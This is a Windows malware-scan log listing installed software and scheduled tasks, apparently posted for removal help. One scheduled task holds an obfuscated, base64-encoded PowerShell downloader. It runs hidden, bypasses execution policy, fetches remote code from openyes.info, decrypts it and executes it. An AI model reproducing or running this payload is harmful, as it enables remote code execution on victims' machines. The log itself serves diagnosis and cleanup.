Epson Easy Photo Print 2 (HKLM-x32\...\{07AA1C7F-E8CA-4FDC-B975-BC9EBC22B6DE}) (Version: 2.7.0.0 - SEIKO EPSON CORPORATION)

Epson Event Manager (HKLM-x32\...\{17FA0444-A025-43B9-862C-81AE6307C2F2}) (Version: 3.10.0050 - Seiko Epson Corporation)

Epson E-Web Print (HKLM-x32\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)

EPSON Manuals (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.50.0.0 - SEIKO EPSON CORPORATION)

EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)

EPSON XP-322 323 325 Series Printer Uninstall (HKLM\...\EPSON XP-322 323 325 Series) (Version:  - SEIKO EPSON Corporation)

EpsonNet Print (HKLM\...\{15A0F113-BF2C-4C12-8AA8-42AE0D9AE1C9}) (Version: 3.1.2.0 - SEIKO EPSON Corporation)

Google Chrome (HKLM-x32\...\{01EF2457-B546-3A54-8F9A-065EA5221A9C}) (Version: 48.0.2564.103 - Google, Inc.)

Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden

HP Support Solutions Framework (HKLM-x32\...\{F6A11738-3EE4-4573-AEA5-6CD5D491C167}) (Version: 12.0.30.219 - Hewlett-Packard Company)

HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.5.1 - Hewlett-Packard Company)

Inspiration 9 IE (HKLM-x32\...\Inspiration 9 IE) (Version:  - )

Inspiration 9 PDF Driver (novaPDF 7.3 printer) (HKLM\...\Inspiration 9 PDF Driver_is1) (Version:  - Softland)

Intel® Chipset Device Software (x32 Version: 10.0.22 - Intel® Corporation) Hidden

iTunes (HKLM\...\{0D44E3A4-6C3D-45D7-B443-079509E5BE5D}) (Version: 12.3.2.35 - Apple Inc.)

Microsoft Office Home and Business 2016 - en-us (HKLM\...\HomeBusinessRetail - en-us) (Version: 16.0.6366.2062 - Microsoft Corporation)

Microsoft OneDrive (HKU\S-1-5-21-1343854479-873069186-2863876452-1002\...\OneDriveSetup.exe) (Version: 17.3.6301.0127 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)

MyEpson Portal (HKLM-x32\...\MyEpson Portal) (Version:  - SEIKO EPSON Corporation)

MyEpson Portal (x32 Version: 1.1.1.0 - SEIKO EPSON CORPORATION) Hidden

Office 16 Click-to-Run Extensibility Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Licensing Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Localization Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden

Olympus Sonority (HKLM-x32\...\{40CAF5AE-4E70-46C8-8AD8-4A036D32525C}) (Version: 1.4.4 - OLYMPUS IMAGING CORP.)

QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7414 - Realtek Semiconductor Corp.)

Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)

Save to Video (HKLM-x32\...\{CA2A6D7F-514E-40FF-ABE4-289E606BC553}) (Version: 1.10.5 - Claro Software)

ScreenRuler (HKLM-x32\...\{F0D0C21A-1C82-4345-A8BE-EC28A9CA813E}) (Version: 3.2.10 - Claro Software)

Skype™ 7.3 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.3.101 - Skype Technologies S.A.)

Software Updater (HKLM-x32\...\{8DBC5A0A-31C4-46C7-B252-6B593EA11A87}) (Version: 4.3.7 - SEIKO EPSON CORPORATION)

Sonocent Audio Notetaker 4.1 (HKLM-x32\...\{2B2BF01C-0EB8-446B-80AB-AA0ADA01A9D1}) (Version: 4.1.5027.0 - Sonocent Ltd.)

Spellex Dictation Gold Medical (HKLM-x32\...\{E1742941-2980-448E-BA63-800664BFC8AA}) (Version: 1.27.2015 - Spellex)

Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.7.6 - Synaptics Incorporated)

The Desktop Weather 2.0 (HKLM\...\WeatherTool) (Version: 2.0.0.10998 - ShenZhen Enode Techology co,.Ltd) <==== ATTENTION

Validity WBF DDK (HKLM\...\{DB87BB79-2BDF-424E-A534-6F29C402AF46}) (Version: 4.5.246.0 - Validity Sensors, Inc.)

VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)

Vocalizer Daniel from Claro Software (HKLM-x32\...\{36FB67D5-2099-41E0-8E28-7E061828845C}) (Version: 1.2.1.0 - Claro Software)

Vocalizer Fiona from Claro Software (HKLM-x32\...\{AE789798-995E-47D0-A16C-55E97BCDBFC8}) (Version: 1.2.1.0 - Claro Software)

Vocalizer Karen from Claro Software (HKLM-x32\...\{BFF55ECD-AA48-4872-82A5-65BFD3598CB8}) (Version: 1.2.1.0 - Claro Software)

Vocalizer Lee from Claro Software (HKLM-x32\...\{8B0DF0EC-FCC1-4A97-86E4-E0D9720DAA92}) (Version: 1.2.1.0 - Claro Software)

Vocalizer Moira from Claro Software (HKLM-x32\...\{B8C81D28-7194-4F07-94BE-733615F498E9}) (Version: 1.2.1.0 - Claro Software)

Vocalizer Sangeeta from Claro Software (HKLM-x32\...\{3C7D16C3-F67E-467B-9200-B02C020C5A78}) (Version: 1.2.1.0 - Claro Software)

Vocalizer Serena from Claro Software (HKLM-x32\...\{4345FA12-BFC9-492B-B47C-C7BEF6785398}) (Version: 1.2.1.0 - Claro Software)

Vocalizer Tom from Claro Software (HKLM-x32\...\{985F3407-E764-4D79-B1AB-ECA53FFBEC52}) (Version: 1.2.1.0 - Claro Software)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {1FA5BAC6-912E-4071-8FF0-612A0375EEB8} - System32\Tasks\{087E0D47-040C-780F-0511-0B09797E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAG8AcABlAG4AeQBlAHMALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGIAcQB6AHYAWQBjAGsAcQB6ADQAYgBoAHQARwAyAGsAbwBlAHAAdgBiAEEANQByAHgAUwB0AEgATABqAF8AUwA5AGgAdwBRAFkAagBYAEUAdgBtADkAVgBRAFMAQQBFAGwAawBhAFEAUAB3AFAAVAA4AGwANgBRAFEAZAAzAGMANgBxAFIATgBFAFIAWgAtAHoAdQB0AE0AVABXAEkATAAtAHUARABzAGQARgBUAGEAeQB0AHUAUwBwAEgAQwBoAGsATAB1AFEARgBmAGIAQwBCAEcATAA2AHEAZQAtAGwARQBXADQAawBFAGkAbgBPAFoAawBhAEEAWgAtAEsAVQBvAE4AcgAyAGoASABpAGQAYgBWAGsAagBZAEYAYQBCAEQAVQBDAHIAQgB2AEwANQBKAHkAYwBjAGMAdwB6AEEAcwBrAFQATgBVAFQASQBiAGkAYQBCAG0AVABoAFEALQBxAE8AQwBjAEoAbQBZAHQAUgBnAFUAXwBIAEEATQByAEUAQQBXAHgANwBwAEkAYgBmAGQAQQB0AGkAcwBpAHIAaABjAFgAdABOAGgARABuAEsAQQBqAFEAUQBxAGsAWABGAHQAeQBhAFoAQwBTAGsAdAB6AHMAMQBnAG4AMgBaADUAZgAzAFoAZAAzAFEAVQB2AGIAWQBuAGcAdQBoAFUANwBFAGsAUwA0AEwAeQA5ADEAagBjADMAYwB4AG0ANABjADYAdgBtAGsAbABaAGMAZgA3AGwAMQBNAGYAdwBGAGoAMgBOAFcATABTAF8ARwBGAGoAUQAzADIAdAAxAHAANQB1AGwAYgBXAGsAaABzAGYAQwBkAEUAcABVAGwAVwBKAHgAYwBfAFUAZQBsAHYAUgBDAFEAUwBJAFIARwBiAE0AawBCAC0AZgBfAE4AcQBrAG4ASQBUAGsARwBFAGwAUABoAHYAdgBSAFQAZABaAFMAdQBuAEoAYgBYAEYAMABkAHMAdQBwAE8AVQAxAFUAdQAyAEgAVABEADkAUgBCAE0AcgBKAEYAaQB4AGYAYQBBAFYAZwAzAF8AaQB3AFAAcgBfAGIASABXAEQAMQBtAGMAOQBJAGwAdABMAFMAOQAxADUAQQBKAFEAWgB0AEgAVwBFAEIATgBuAGMATgB4AEkATABlADMARwBMAFQALQBDAFMAbQA1AEEASABOADUAZwB5AEoAegBzAHcAQgBaAEYAWgBPAEQAegBIAEgALQBYAFEAXwBoAFkATQBLAEEATwBTAHcAUwA4AFIAWQBrAFYARQB2AEYARABJAHAAQgBsAEUAcgA0AEkAWgBHAG8AbAAyAEgALQBBAHkAUQBQAE4AQwByAEUALQBMADIASgA3AEoARgBRAGsAXwBhAEsAMwBtAFIAVABXAFoARQA0ADIAbwBPAEUATQByAEUAUABJAG0ATwBRAFUANQA2AEoAegBnAHIANwBRAFQAeQBjAGgANAAtAEcATgBzAGEAdwBwAEUAMQBVADQAdgBlAGoAUABkAGgAawBPAE8AOQAxAFYAVwBCAHYASgBGAGIASQBwAFEAQgBnADYAVwBJAFcAUQBLAHIAZwBFAFcAdQBNAEcASABhAC0ATAB2AEkARABWAGsAYwBRAHQAMABTADQAUQBSAGQAXwBZADAAZgBqAFIAZgBiAGYAMQBHAC0AcQA5AEsAeAByAGoAOQBmAGgAUABFADUALQBpAGwAUwBXAHQAUwBOAFAAWABZAHgAZgBjAE8AbwA4AHgAbwBUAFQASwB5ADgAUABXAEMATQBxAE0AMQB4AGIAQwBOAFMAMwBqAHgAUQBuAFEAZQAxAFIAegA5AG8ARAA3AG8AYQBQAEsASgBvAFkASgBfAEEASwBDAG0AVAB6ADQAaABhAGwARQBLAF8AUABYAE4AZwBaAEQAYQBUAGEAUQA0AHEAZwA0AFEAcQBPAGgAMgBPAEQAdgBLAEkAUAB0AFUAQwBnAEQAVgA4AFoAWQBtAGYASwBpAGYAVwBMAHAARgBmADIAQgBEADQAaQA4AHcAUgBkAE0ASgA4AFEAVgBkADEARgBoAEQAUAA5AEcATgBqAFoAUgBsAHQAYQBYADkAbQBFAHoAUQBmAHMAMgBqAGcAagBCAEUAMQA4AHIAcgBnADUAbABKAEQAOAA5AEoAQgB1ADkANgBpADYAVgBnAGEAZgBEAFkANwBIAF8AcgB4AEcARQA0AFQAZwB2AG0AaQBHAG4AVgA2ADQAdABrAGIAcwBJAHkANgBIAHkAMwBmADkAbwBSAEEASAA4AGQAMwA0AHoAUABZAFgAdgAxAHgALQAyAHYAWQBmAEsANwBtAGkAZgB1AC0AUAAmAGMAPQAzAGEAZABOAFMAXwBsAGwAZwBLAFYAYQA3AGgAVgBNAGkAcQBOAGYAbgBGAEcAeABTAGcAawBMAFoAQwAzADkASwBxAHEARwBSAHcAOABjAGsAWgBoAFIATQBDAHAAbABqADQAZQBUAGMAWQA4AFAAdAB0AG0AYwB1AGcAdAA2AEQASwBZAEwAMAAwADgANgBWAGoASQBQAGQAVwB4AFEASAAtAEQAWABfAHQANABjAHUAbwBUAEUAOAB5AE4AUwBrADgAWABBAEsAOQBlAF8AMABlAGoANgBBAEkASwB1AEkAQwBrAG8AcwBtAFYAawBQAHgARABqAFAAdAB5AFYAeQBqAGYARwBiAGkAQgBPAEcAegAwAGMAcQBaAHIAZQBVADAAcQBXAE4ANABLADkALQBDAGwAQQA0AEcAZgA4AEcANgBTAGkAMABwAGsAagBFAEkASwBTAGQAYQBTAHMAQgBRAHIAegBIAHIATwAyAHYATgBaAG0AcQAxADUAbwBQAFYAWQBwAEcAagB6AE0AdwBCAGsAQwBBAFEAZwBjAHMAbgBnAFkAMABtAHAAcABBADAAVQBJAGoAMgBzADYANABBAEMAQwBXADYAZgBTAGEAUQB0AE4AaABVAHcAbQB2AFgAaQBFAFcAZgBDAG8AWgBrAEcAegBQADAAYwBUAFYAMAB4AHQAbgBlADEARQBYAEYAbQBzAGkAaQBkAE0AMQBzAE8ARQB3AEIARgBNAG8AZwBVAFkASQBUAGsALQBIAHQAMQB3AGEAcQBKAGsANQBwAHMATABmAHkAagBDADcANwBtADEAMABBAFoASgBqAEwAdQByAHkARABIADYARQBQAEYAaAB0AFcAZwBsAHIAaQBlAEYAZwBhAGUAZwB2AFIAdABLAGgALQAtAG8AUQBPAGoAXwBnAEIAVwBuAGcAZgBVAHkAUAB4AHEAWgBmAHYAYwA3AHEAWQBQAHcAZQBZADcAQgB4AFgAYwBLAHoANgBUADcAcgBvAG8AcwBVAHAAcQBEAEkAYgBoADkAZQBDAEgAOABZAFcANABhAE4AUwBIAGgASQBEAFcAbwA0AEQAcwBuADIAcwBYAGoAVgB6AHMAbwBKAHUAZgBZAGwAegB3AGoAOABQAC0ARgBfADgAVgBEAFYAOABUAEcASQBpAFYAcgBxAC0AZABaAGIAZABUAC0ANQBVADMAcwAzAGwAOAA3AEwAbQBlAHcAUABIAHYARABQAGUAVgAzAHMANABWADkANQBEAHAAcgBKAEoAQgA3AFQAdQByAEUAWgBUADkANgB6AFYATwBrAGYARABZADYARwBiADcAUgByAE4AMwBCAHkARQB5AEoAQQBBADMASgBWAE0AaAA3AEUATwBFAEwAdQBpAHgAUQBtAFoAWQAtADUANwBxAFkATABtAHMANgAzAHIAYgBBADQAYwBhAHQAVgBXAHMANgBrAEQAcQBBADIAbwBZAHEAYQBPAHUAbQBlADEANABXAHAAZQBLAEwATgBxAG4AZQBxADkAcQBrADEARgBHAGgAcABRAHkATwBCAFQANgA0AEkAMwBrADAATQBaAHEAdAAtAFMAQwBhAGQARgBIAG8AOQBHAEIAWQBHAGwAdwBNADUARQBPAE8ATABTAG4AUABZAG8AVAB3AEMAdABZADgAeQB2ADYAbAA3AGQAcQBVAEQASwBmAFAAUABLAEQAZwAwAE8AdABsADYAQQBaAFQAWQBLADMANwA2AG0ATgBLAC0AOABQAG0AUwBGAHcARwBmAHUATQBHAG4AVgA3AFEANwB0AEQASwB6AEkAOAA2AGMAdQBxAEwATQBDAGsAUABJAG0AbgBTAC0ASAAzAGYAQQBvAFoAOABNAEkAbQBVAEMAVwBzAF8ARgA5AHoAZwB2AGsAegBRAEoAegBzAFEARABCAHYAUgBQAEwAegBQAE8AdQBWAHAAOAB6AEYAaQBDAFIAUQBPAEUAbQB2AEoAcwBVAFEAaABVAFUANwB4ADYAYwB0AHgAQQBVAHQARQAyAG0AOQBMAHoAWgBuADkAZgBfAFQAQwBFAG8ATABSAGIAdQBhAEwANwBBAFgAMABqAGUARwBZAHcAQgBSAEwAdwBJADgARABlAC0AUQBCAEIAMQBDAEQAUABfADEAMQBfAFgAUABzAFkAcQBhAFUATQBMAGsAZABPAHYAWQBzADIATABpAEwAaQBaAEgATwBXAHkAbABfAGYAUwB4AFMAVQBpAE4AcQB0AFgAagBHAGcAegBnAEYAawBXADQASgBHAEUAYwBGADYAYQBYAC0AagBUAGsANQBMAFkAWgBoAHAAaABxAFYAMwBpAGUARwBEAEkAUQBBAEcAbABNAHEARQBMAHgAVABDAE0AYwBPAFAASwBMADcARABMAC0ATgA0AEkAaAA1AHcAcQByAG0ANQBWAHgAZQBTAGQAWABmADAAXwBaAGYAYQBUAEIALQBmADgAdQBlAHQARwBGAHcAYgA3AG4AdgBnAEkAJgByAD0ANAAxADQAMQAzADMANwA5ADEAMQAyADkAOQAyADYANAAxADkAIgA7ACQAcwB0AHMAawA9ACIAewAwADgANwBFADAARAA0ADcALQAwADQAMABDAC0ANwA4ADAARgAtADAANQAxADEALQAwAEIAMAA5ADcAOQA3AEUAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIATABNAFAAWQBMAFIAVABYACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA

Task: {338E3F22-6BBD-44BA-9FF9-2AD947C3E864} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)

Task: {39F405B1-A5DD-4095-A83F-4F7E36C70E90} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)

Task: {48732612-692B-4ED3-B466-B9D75B2262DA} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION

Task: {596FDB6E-A01F-45C2-8D19-3E109687F226} - System32\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE [2013-11-22] (SEIKO EPSON CORPORATION)

Task: {710FFFC7-4734-4D8B-856B-189E4BBD7E41} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-07] (Google Inc.)

Task: {7F209075-152E-4942-AC1C-445F76407004} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)

Task: {8FA80B74-5C5A-40F7-BC95-8178BAC3B04C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater – Install HPSA => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-01-06] (Hewlett-Packard)

Task: {995EBB86-0968-4E1D-AEE9-CFF6BA6ADBB1} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)

Task: {A1340996-9DFD-4643-9DB9-CD6557F04C78} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-01-13] (Microsoft Corporation)

Task: {B73AB507-80A1-4CCC-AFBC-5BEA965C19F8} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)

Task: {B7E87F06-7BDB-44FA-BA49-F0A0E2720DDD} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)

Task: {BCDE7591-5275-4FC5-8E20-0C2C5EEF8724} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1343854479-873069186-2863876452-1002 => C:\Users\Molly Poole\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2016-02-05] (Microsoft Corporation)

Task: {EDFD5295-3F44-4410-8F1F-8CFADB927E39} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)

Task: {F23E56AC-D047-4CB6-9B31-6C68F4F5628F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-07] (Google Inc.)

Task: {F294D4E7-6102-488D-996D-3EEA4F9452AC} - System32\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65} => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE [2013-11-22] (SEIKO EPSON CORPORATION)

